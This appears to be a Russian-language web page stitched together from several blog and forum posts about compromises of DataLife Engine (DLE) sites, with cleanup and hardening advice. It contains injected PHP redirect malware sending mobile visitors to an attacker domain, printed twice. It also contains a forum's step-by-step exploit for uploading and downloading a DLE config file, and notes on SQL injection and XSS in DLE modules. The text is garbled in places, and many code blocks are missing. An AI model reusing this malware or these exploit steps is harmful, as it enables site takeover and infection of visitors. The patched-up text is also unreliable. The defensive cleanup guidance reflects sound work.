Как взломать сайт на DLE


DLE: как найти вредоносный код на сайте после взлома?

Здравствуйте дорогие друзья! За последние несколько дней, со мной случилось много интересного, точнее не со мной, а с моими сайтами. Интересного, да не очень приятного, но зато опыта набрался немного, вот решил им поделиться. Значит кто-то подсунул на один из моих сайтов вредоносный код, который перенаправлял посетителей с мобильных устройств на загрузку архива с обновлением браузера. Через несколько дней, еще были попытки взломать мой посещаемый сайт, но об этом в другой статье. Сейчас я расскажу, как у меня взломали сайт на DLE и подсунули на него вредоносный код.

Дело было так: купил я сайт на DLE с этим движком практически не работал, но как то удалось перенести без проблем, продавец попался хороший, помог. Сразу после переноса сайта на мой хостинг, проблем не было, все отлично работало, я доволен. Где-то через неделю после покупки, я случайно решил зайти на сайт с телефона (у меня Андроид). При переходе на сайт, сразу же появилось окно с предложением сохранить установочный файл .cab. Что то типа обновление браузера, короче насколько я понял, платный архив.

Я сразу понял, что сайт взломан и быстренько решил погуглить, так как в DLE я полный ноль, даже не знал с каких файлов начать искать вредоносный код. Но перед этим я сразу же сменил пароли на сайте, к БД, на хостинге и на FTP.

Проверил сразу файл .htaccess но там было все чисто. Нашел информацию, что нужно сначала искать код в файлах engine.php, config.php и т. д. Проверил эти два файла, в обоих обнаружил вот такой код:

$iphone = strpos($_SERVER[‘HTTP_USER_AGENT’],»iPhone»);
$andro > $palmpre = strpos($_SERVER[‘HTTP_USER_AGENT’],»webOS»);
$berry = strpos($_SERVER[‘HTTP_USER_AGENT’],»BlackBerry»);
$ipod = strpos($_SERVER[‘HTTP_USER_AGENT’],»iPod»);

if ($iphone || $andro > header(‘Location: http://statuses.ws/’);

Как видите, этот вредоносный код, определяет посетитель с перечисленных в коде устройств и перенаправляет их на вредоносный сайт.

Значит нашел я такой код в файлах engine.php, config.php, dbconfig.php, index.php и init.php. После удаления кода с этих файлов, сайт с телефона открылся нормально. Продолжив проверку, я еще нашел этот код в файлах engine.php в корне сайта и в файле download.php в папке engine. Нужно бы еще сделать поиск по всем файлам сайта, пока не делал, но сделаю.

Так же написал в поддержку хостинга, с просьбой провести проверку сайта на вирусы. Они ответили, что просканировали сайт, но ничего подозрительного не нашли. Забыл еще написать, за несколько дней до этого, Яндекс прислал мне письмо, что при проверке этого сайта был найден вредоносный код, но после повторной проверки его уже не было обнаружено, я подумал что это глк. А это значит, что такой код может находится на сайте и Яндекс вам об этом не сообщит, конечно же лучше найти его первым :).

Еще проверял сайт такими сервисами как http://2ip.ru/site-virus-scaner/, но они ничего не находили.

Остается только вопрос, откуда там взялся этот вредоносный код. Я конечно же сразу подумал на продавца, что сайт с этим кодом был передан мне. Но сразу после покупки, я делал копию сайта. Проверив файлы в которых я обнаружил код, я увидел, что сайт мне был передан чистым, то есть сразу после покупки, файлы engine.php и т. д. не содержали вредоносного кода. Значит был взлом, подозреваю, что были украдены пароли к FTP.

Но рядом с этим сайтом лежали и другие, намного лучшие сайты, которые вроде как не пострадали.

Ну я все таки думаю, что попытки подобрать пароль к админке WordPress к одному из моих хороших сайтов через несколько дней после этого случая, это все таки совпадение. Кстати о том как меня хотели взломать, подобрав пароль к админке WordPress, я напишу в следующей статье. Удачи и берегите свои сайты.

Компьютерные уроки, статьи и советы по настройке компьютера и сетевой работе — создание, оптимизация и продвижение сайтов и блогов в Сети Интернет, программирование HTML, XHTML, CSS и ява-скрипт

Установка и загрузка ОС Виндовс

Взломали сайт на DLE

Письма счастья Data Life Engine

Уже в который раз я получаю письмо,
якобы от саппорта Data Life Engine. Письмо отправляется прямо из сайта по обратной связи и имеет следующее содержание:

Технически, поломать защиту современного сайта очень непросто. Практически невозможно её поломать. Уровень защиты любого веб-ресурса достаточно высок и постоянно совершенствуется. Если-бы сайты ломались так легко и быстро, как об этом пишут в газетах – в Сети давно-бы уже не осталось ничего и никого, кроме славной когорты хакеров, умилённо взирающих «на рук своих творение». Однако, увы – такого не происходит. А, за сим, можно с уверенностью сказать, что слухи о гениальности хакеров, особенно малолетних – слегка преувеличены. Вся эта шумиха со взломом сайтов рассчитана на среднестатического обывателя, далёкого от сайтостроения.

Иное дело, человеческий фактор. Человека, в отличии от бездушной машины – можно купить, напугать, заинтересовать, короче – воздействовать на него психологически. Про один из таких психологических приёмов воздействия на владельцев сайтов на DLE – эта статья.

Сайт на Data Life Engine – под угрозой
(Письма счастья от злоумышленников)

(Привожу текст с сокращениями, орфография сохранена)

Не буду вдаваться в технические подробности этого процесса, ибо в данном случае – статья не технического, а философского характера. Автору всего лишь хочется просто посокрушаться над своей беспечностью и над беспечностью общечеловеческой, да ещё – посочувствовать себе самому, сирому.

Да уж. Читая такое письмо, лишний раз убеждаешься, как хил и слаб умом и телом человек в этом мире. И, что любая, даже самая хитрограмотная защита с лёгкостью разрушается об так называемый «человеческий фактор». Ведь, все мы люди. И, ничто человеческое нам не чуждо. В том числе, и поспешные дурацкие выводы, и необдуманные поступки, на которые так горазд человек. И, на которые – так рассчитывают рассылатели вот таких вот писем. Это я щас здесь философствую, а помнится, когда-то чуть сам не попался на эту удочку. Первое такое письмо повергло меня с лёгкий шок и недоумение.

Топ-пост этого месяца:  Массивы в PHP. Функция array_filter

Согласитесь, если человеку авторитетно заявляют, что его сайт под угрозой, то это самое естественное желание у владельца сайта – куда-то бежать и что-то делать. Короче, надо спасать свой горячо любимый веб-ресурс. Ну, а как спасать, и что нужно делать – уже написано в самом «письме счастья». «Доброжелатели» уверенно рекомендуют, добавить всего лишь пару строчек вредоносного кода в один из самых главных системных файлов движка. Чем и открыть дорогу для удалённого издевательства над ним. Так сказать, спасибо Вам, люди добрые, помогли. Принесли добрые вести «на блюдечке с голубой каёмочкой». Вот такой психологический расчёт, чтоб его за ногу.

Официальные контакты разработчика DLE

Крайне не хочется сильно умничать и упиваться собственным острословием.
Как говорится, от тюрьмы, да от сумы – не зарекайся.
Но, есть желание обратить внимание добропорядочного читателя на тот неоспоримый факт, что официальный разработчик CMS DLE никогда не использует обратную связь прямо на сайте-реципиенте (сайте-получателе). Не использует, по причине полного отсутствия такой необходимости. Официальный разработчик DLE контактирует со своими пользователями только через собственную базу данных, в которой собраны регистрационные адреса настоящих владельцев этого скрипта. Ведь обычная обратная связь на любом сайте DLE ведёт просто к его Администратору. И тут, вовсе не факт, что Администратор сайта является его владельцем. И, у него есть доступ на хостинг, и право на редактирования файлов движка.

Отдельным абзацем обращаю внимание добропорядочного читателя, что реальные «дыры» в защите реального CMS DLE были настолько давно, что все уже и забыли, как поступает настоящий разработчик DLE в таких случаях. За последние семь лет работы с DLE, это было только один раз – я получил настоящее письмо об настоящей угрозе от настоящего разработчика DLE. И, что характерно, вид текста письма и форма обращения были совершенно другими. И мне никто не предлагал править никаких системных файлов. Разработчик DLE просто известил меня, что на их оф.сайте, можно и нужно скачать и применить патч, который они там уже заботливо подготовили.

Таким образом получается, что вся «шняга» с этими «письмами счастья» рассчитана на пользователей движка DLE, которые никогда в жизни не видели настоящей «аварийной» рассылки от самого DLE.

Вероятность взлома сайта на DLE

Вероятность технического взлома сайта на DLE равна нолю.
Сайт на DLE можно ломануть, только разве что подобными методами Остапа Бендера – вынудить владельца веб-ресурса сделать какую-нить глупость. Исторически, CMS DLE годами развивалась, как многопользовательский движок. А это означает, что от всех атак и выходок со стороны своих юзеров он защищён, как нельзя лучше. Ну, а однопользовательские сайты-блоги на DLE – так эти вообще, не потопляемы. Фильтрация ввода данных в CMS DLE доведена до совершенства и, если не модифицировать файлы движка, как это предлагают в «письмах счастья», то для взлома сайта на DLE есть только один способ – вежливо попросить у его владельца ключи от сайта и заодно от квартиры, где деньги лежат.


Из реальных опасностей остаются только вирусы и ДДОС-атаки. Но, это уже – совсем из другой оперы. Опять-таки, защита от вирусов полностью находится во власти владельца сайта. В его исполнении, это больше философия, нежели наука. Ну, а что касаемо ДДОС (dDOS) атак, то это удовольствие очень дорогое и технически – очень непростое. Удостоиться чести ДДОС-атаки суждено далеко не каждому сайту, а уж тем более – блогу.

Массовый взлом сайтов на движке DLE

Внимание друзья и пользователи движком DLE. Недавно обнаружил посторонние iframe включения в страницах своих сайтов, покопавшись в интернете увидел, что такой же проблемой страдают тысячи других сайтов на DLE. Атака производилась после нового года, приблизительно в 5-6 числах и продолжается сейчас.

В этой теме я расскажу как избавится от этой проблемы и излечить свой сайт от посторонних включений!

Как распознать проблему?
-При переходе по страницам сайт начинает жутко тормозить!
-В полных и кратких новостях присутствует нечто:

Описание проблемы!
Эти включения представляют собой включения в базу MySQL, некоторые из них имеют обычный вид, а некоторые имеют генерируемые комбинации, типа

кторох удалить немного сложнее чем обычную статику. Не пытайтесь искать включения в файлах, весь этот мусор как я уже говорил храниится в MySQL!

Решение проблемы и закрытие дыры в жвижке DLE

1) Смени пароль на базу данных.

2) Сделай 2 автозамены в базе или в «поиск и замена«:

3) Проверь все файлы сайта (на фтп поиском) на содержание следующего текста:

Сравни найденные файлы с исходниками движка и лишнее удали.

4) Поставь последние заплатки (включая платные)

Итак, например У меня в краткой и полной новости появилось по 3 скрипта

Делим их для удобства:
1.

1 удалить будет сложнее т.к код после слеша везде разный, поэтому начнем со 2 и 3!
Идем в phpmyadmin, выбираем вкладку SQL, видим окошко и туда вписываем:

Нажимаем ОК, после чего пропадет из новостей скрипт №2!
Не закрывая SQL удаляем так же скрипт №3 тоесть выполняем Такой sql запрос:

Нажимаем ОК!
Скрипт №3 так же удален!

Теперь возьмемся за скрипт №1
В phpmyadmin выбираем вкладку «Экспорт» и нажимаем ОК, сохраняем на компьютер!
Открываем эту базу с помощью ОФИСОВСКОГО ВОРДА, нажимаем «правка»—>>»замена» и вписываем в поле найти: (zheenix)*(js) а в поле замена zheenix.ru , тут же нажимаем «больше» и ставим галочку на «Подстановочные знаки» , нажимаем «заменить все»!
Этим мы избавились от разного кода! Сохраняем изменения!
Идем в phpmyadmin — структура — и отмечаем все галочки — далее удаляем все!
Теперь идем во вкладку «импорт» , нажимаем обзор и выбираем Нашу измененную БД, ставим вместо utf8 — cp1251 и нажиимаем ОК! База загружена!
Теперь бежим в вкладку SQL и выполняем такой запрос:

Вот собственно и все! Можно конечно и облегчить это все, но я написал как делал сам!
Заняло у меня это минут 10, все же быстей и проще чем руками это делать!
Теперь только надо думать о заплатках)

А теперь про ХАКИ, закрываем все дыры у нас в движке

1. Взята с ОФФ сайта DLE
Проблема: Недостаточная фильтрация входящих данных.

Ошибка в версии: 9.0 и все более ранние версии

Топ-пост этого месяца:  Минус-слова в Яндекс.Директ - как подобрать и добавить списком

Степень опасности: Высокая

Для исправления откройте файлы engine/modules/search.php и engine/modules/fullsearch.php и найдите:

Откройте файл engine/inc/templates.php и найдите:

2. Запрещаем включения типа скрипт и ифрэймв полной и краткой новости:
Проблема: Недостаточная фильтрация входящих данных при обработке новостей.

Опишите Взлом DLE!

19.11.2009, 00:13 #2
29.09.2010, 23:09 #3

06.10.2010, 17:15 #4
18.12.2010, 14:51 #5

несколько сплоитов для DLE 8.3:

09.02.2011, 00:40 #6
Последний раз редактировалось SWW; 18.02.2011 в 22:34 .

есть баг в 8.3, там через images.php можно грузить на сервер все что хочешь_

Добавлено через 1 минуту 18 секунд

14.04.2011, 18:21 #7
Последний раз редактировалось artk00; 14.04.2011 в 18:21 . Причина: Добавлено сообщение

Взлом сайта на DLE версии ниже 9.0, инструкция (Работаем через браузер Opera 10).

1. Заходим на сайт жертвы

2. Регистрируемся и авторизуемся на сайте

3. Переходим по ссылке

(где site.ru — адрес жертвы)

4. Открываем исходный код открытой нами страницы и после:

(строка может немного отличаться и повторяться 2 раза, вставляем после 1й)

Нажимаем в браузере, под вкладками Применить изменения

5. После этих действий необходимо проверить работоспособность дырки, для этого на странице

, чей исходный код мы редактировали пунктом выше, нажимаем Загрузить. В списке загруженных файлов должен появиться dbconfig.php, мы можем продолжить.

Что бы скачать файл конфига мы должны навести на него указатель мыши и посмотреть ID, затем через Исходный код страницы / Применить изменения мы вставляем в любое место страницы сайта жертвы ссылку вида:

Как могли взломать сайт?

Может кто нибудь дать оригинальные файлы?

Измененные и запущенные файлы — это уже следствие, когда хакер получил доступ. Это уже никому не интересно.

А причину надо искать в другом. Обычно вирус на вашем компе (и кража пароля от ftp), перехват пароля (например, если ftp, а не sftp с публичными/приватными ключами), подбор пароля, SQL-инъекция, отсутствие валидации вводимых данных и загружаемых файлов, неправильная настройка веб-сервера и пр.

Как защитить DLE от взлома?

Очень многие сайтостроители встречались со взломом DLE. Ни для кого не секрет, что DLE наиболее подвержен взлому, особенно если он не обновленный. В этой статье я расскажу вам о самых популярных способах взлома DLE и о том, как не дать злоумышленникам получить доступ к вашему сайту.

Первоочередной задачей вебмастера, чей сайт стоит на DLE — обновление движка. Если ваш сайт стоит на DLE версий ниже 10.0 — бойтесь. Потому как это дает возможность практически любому получить доступ к PhpMyAdmin и вписывать новых администраторов. Часто получается, что настоящий администратор сайта даже не подозревает о взломе своего ресурса. Получив доступ к PhpMyAdmin, злоумышленники могут делать практически все, что им заблагорассудится, вплоть до удаления баз данных.

Для того, чтобы обезопасить сайт от многочисленных способов взлома DLE, нужно уделить внимание файлу .htaccess , который будет находиться в директории /engine/classes/min/ (это при условии, что вы все-таки обновили свою версию DLE, или же установили заново версию 10.1 и выше)

Создаем в этой директории файл с названием .htaccess , в него добавляем код:

После проделанного создадим в папке /engine/classes/ файл .htaccess, а внутрь добавляем код:

Эти действия были нужны для случая, если на ваш сайт еще никто не посягал. Если же доступ к сайту уже имеют некие злоумышленники, необходимо:

1. Установить на все файлы .htaccess движка права CMHD 444 . Таким образом вы запретите работу со всеми файлами кроме файлов .htaccess
2. Установить на все файлы шаблона права CMHD 444 (кроме папок). Таким образом вы запретите редактировать файлы шаблона всем, даже вам.
3. Можно воспользоваться способом защиты с помощью файла .htaccess , который находится в корне сайта. Открываем .htaccess и дописываем после RewriteEngine On:


Если вам необходимо добавить пользователя DLE через mysql, прочтите статью, на которую ведет ссылка. Это может пригодиться для случаев, когда у вас уже нет доступа в админ-панель DLE.

Хотелось бы заметить, что подобного рода уязвимости присутствуют не только на Datalife Engine, но и на WordPress, Jumla и ряде других CMS. В случае, если вы видите, что над вашим сайтом уже ведет работу взломщик, вам потребуется написать в службу поддержки хостинга с просьбой прикрыть доступ всем, в том числе и вам.

Вернера блог

Ремонт, программирование, восстановление

Рубрики

Взлом DLE загрузкой аватара с вредоносным кодом

Этот новый год начался забавно.
Много лет в известном всем движке CMS DLE существовала уязвимость и никто на нее не обращал внимание. Но вот в начале этого года примерно с 6 января, видимо устав от празднования Нового года, хакер под псевдонимом tehApocalypse взломал несколько десятков тысяч сайтов на CMS DLE.

Взлом заключался во внедрении кода в несколько файлов DLE для перенаправления посетителей зараженных сайтов на сайт злоумышленника.

Перенаправление происходило только для пользователей сматфонов и прочих продвинутых телефонов.

Итак как же исправить эту уязвимость в DLE?

В нескольких файлах, в которых мы можем редактировать профиль пользователя и загружать аватар для этого пользователя есть такой код:

Так вот все дело в этой строчке

Т.е. если аватар не надо изменять по размеру то исходный инжектированный файл копируется в первоначальном виде для дальнейшего использования.

Необходимо преобразовать этот блок кода в новый:

После этого загрузить аватар с вредоносным кодом будет невозможно.
Файлы для редактирования:

[ Обзор уязвимостей DataLife Engine ]

Blind SQL Injection в в модуле DLE Forum 2.1:

На самом деле там две инъекции, в 2х запросах выполняющихся подряд, т.е. одна из ошибок бкдет отображаться в любом случае.

Для выполнения, нужно залогиниться.

Для начала нужно добавить иньекцию в БД

При написании неудачного запроса, его нужно удалить командой: (это важно!)

Символ кавычки мне вставить в запрос не удалось, но можно обойтись и без него, если воспользоваться методами из: http://forum.antichat.ru/thread43966.html

З.Ы.
Сорри, что не добил скуль до конца, времени не хватает, но это возможно.

SQL Injection в в модуле DLE mChat v. 2.0:

Нашёл в админке, и после ORDER BY, наверное бесполезная, но:

И вот ещё, ругнётся на следующий запрос (первый символ должен быть цифрой):

Раскрытие пути в модуле DLE mChat v. 2.0:

Активная, но очень неудобная XSS в модуле DLE mChat v. 2.0:

При отправке сообщения, вида:

В админке теги отфильтрованы не будут, и вместо стандартной администраторской функции редактирования сообщения, админ перейдёт по ссылке. Если очень постараться, можно создать фейковую страницу с просьбой ввести пароль для редактирования, и хитрым образом заставить админа попробовать отредактировать сообщение. (Из области научной фантастики)

Логин админа можно узнать из новостей публикуемых на сайте, но могут публиковать и привелигерованные пользователи, по другому хз.
Накатали скрипт, респект zarin за помощь, который подгружает страницу с серва и сохраняет ее на хосте. Нужно только одно условие чтобы оно сработало, это чтобы админ был залогинен на сайте.


Взлом dle через модуль переходы. Антихак.

Есть такой замечательный модуль для CMS DLE, как модуль ПЕРЕХОДЫ. Он представляет собой возможность учёта переходов на сайт, на котором установлен. С помощью встроенного блока, можно вывести на главную страницу поисковые запросы, по которым переходили на сайт. Этот блок при соответствующем уходе за ним очень хорошо повышает позиции сайта в поисковых системах по СЧ и НЧ запросам. При помощи встроенного вычислителя Вы сможете посмотреть Индекс Цитирования, Page Rang и статистику LiveInternet перехода на сайт. Это очень полезный модуль статистики для DLE, который поможет работать с сайтом в SEO направлении. Но у него есть большой минус — модуль уязвим для XSS атак. Ваш сайт с установленным модулем переходы dle взломают и все посетители с поисковых систем будут перенаправляться на левый сайт.

Я сам постадал от проблемы взлома моих сайтов через дыру в модуле переходы и я разобрался в проблеме. Прдлагаю скачать модуль переходы для dle 9.2, в котором я учел дыры и недоработки официального разработчика, к тому же, поскольку модуль подкорректирован, он имеет статус null.

Cкачать модуль переходы можно без регистрации.

Если с этим модулем вас продолжают ломать — пишите в ПМ или в комментах — по возможности попробуем вместе разобраться и закроем все дыры в DLE.

Еще может пригодится чистый модуль Переходы 9.6: Модуль DLE Переходы v.9.6

В последней версии модуля Переходы 9.6 внесены изменения в безопасность модуля, как и в последней версии Dle. Нововведения касаются исключительно безопасности модуля и исправления выявленных ошибок. Данный модуль Переходы 9.6 (поисковые запросы) может быть установлен практически на любую версию Dle, начиная с версии 8.0 и заканчивая последней на данный момент версией Dle 9.7

Внесенные изменения в версию 9.6: Добавлена автоматическая разбивка длинных слов. Добавлен антифлуд похожих запросов. Добавлен шаблон заблокированного перехода, настраиваемый в админпанели модуля. Доработанная функция определения поискового запроса. Исправлены все обнаруженные и заявленные ранее ошибки в модуле.

Совместимость: DLE 8.x, 9.0 — 9.7

Копирайт отключаем в настройках.

В данной версии есть небольшая ошибка, которую, пожалуйста, исправьте сами. Степень опасности этой ошибки — низкая.

Взлом сайтов на ДЛЕ

Прошлый раз я писал о том, как Жерар Депардье стал жителем Подмосковья и о конкурсе сеокафестатейность, а в этот раз давайте поговорим о компьютерной безопасности.

Первая и самая главная новость за сегодня – это обнаруженная не так давно уязвимость в популярном пользовательском движке Data Life Engine (DLE). В чём заключается данная уязвимость? Как сообщается на официальном сайте разработчика движка, заключается она в том, что в парсере шаблонов идёт недостаточная фильтрация данных. В результате чего, при определенных условиях, злоумышленники получают возможность выполнить в скриптах (шаблонах) сайтов, сделанных на системе управления контентом ДЛЕ, произвольный код, залить так называемый шелл.

Разработчики системы сами определили степень опасности данной уязвимости как высокую, и оперативно выпустили патч (заплатку), которая данную уязвимость закрывает. Заплатка предназначена только для версии dle 9.7. Однако, судя по многочисленным сообщениям пользователей на различных сео-форумах, взломы затронули все модификации девятой версии – 9.7, 9.6, 9.5 и т. д.

Как выглядит вредоносный код, что он делает и как определить то, что ваш сайт на дле был взломан? Как выглядит исполняемый код пока не ясно, но уже ясно, каким образом он попал на сайты. Вначале взломщик регистрировался на блогах и порталах, сделанных на DLE, потом устанавливал графический аватар в формате .gif. После чего отправлял личное сообщение, при прочтении которого и происходил взлом сайта.

В результате вышеописанных действий в следующих файлах cms dle:

прописывался данный код:

$iphone = strpos($_SERVER[‘HTTP_USER_AGENT’],”iPhone”);
$andro > $palmpre = strpos($_SERVER[‘HTTP_USER_AGENT’],”webOS”);
$berry = strpos($_SERVER[‘HTTP_USER_AGENT’],”BlackBerry”);
$ipod = strpos($_SERVER[‘HTTP_USER_AGENT’],”iPod”);

if ($iphone || $andro > header(‘Location: http://statuses.ws/’);

Назначение данного вредоносного кода: при переходе пользователей на сайт с мобильных устройств наподобие айпода, айфона, блэкберри происходил редирект (переадресация) на сайт злоумышленника, где автоматически начиналась закачка исполняемого файла формата .exe.

Как избавиться от данного кода? Очень просто – для этого надо открыть все зараженные файлы в любом блокноте наподобие Notepad++ и удалить указанные выше строки, а также установить все патчи безопасности, выложенные на официальном сайте. В противном случае вредоносный код появится опять на сайте в самое ближайшее время.

Какие признаки того, что ваш сайт взломали и залили шелл? Попробуйте зайти на сайт с iPhona, BlackBerry, iPoda – и если сайт был взломан, то вас перекинет на какой-то другой ресурс сомнительного содержания и/или начнется закачка постороннего файла.

Если у вас под рукой нет мобильного устройства или есть какие-то другие причины, просто поменяйте ваш юзер-агент в браузере.

А вот ещё одна мировая новость, касающаяся компьютерной безопасности: специалисты в области защиты информации сообщают о том, что в Китае обнаружена крупнейшая в мире спам-сеть, базирующаяся на мобильных телефонах с операционными системами – смартфонах. Спам-сеть включает в себя более одного миллиона смартфонов и используется как для рассылки спама, так и для другой противоправной деятельности.

Заражение устройств происходило естественно без ведома пользователей путём установки троянских программ, которые скачивались одновременно с установкой мобильных игр или программ. Управление ботнетом происходило по протоколу, который используется для передачи смс-сообщений.

Вирусы поражали в основном смартфоны на базе ОС «Андроид» вследствие её открытости, а также аппараты на базе «iOS».

Такие вот основные новости произошли на последней неделе. Если хотите прочитать продолжение про взлом сайтов на ДЛЕ, узнать последние околосеошные и не только новости, заходите ещё на этот сео-сайт или подпишитесь на рассылку новостей.

И в заключение предлагаю вашему вниманию посмотреть видео про сео. Видео это довольно занимательное, и хотя в нем нет упоминания про конкурс seocafestateinost , зато там вы увидите и услышите про множество других интересных вещей – про ТИц, Яндекс, сателлиты, линкфермеров, клоакеров, Траст Ранкович и др.

И напоследок традиционный анекдот:

– Здравствуйте, здесь выдают зарплату? Моя фамилия – Итого.

– Нет, здесь собирают налоги. Так как вы говорите ваша фамилия?

Топ-пост этого месяца:  Россия отстает от лидеров в сфере разработки технологий для блокчейна
Добавить комментарий
15.12.2011, 15:34 #8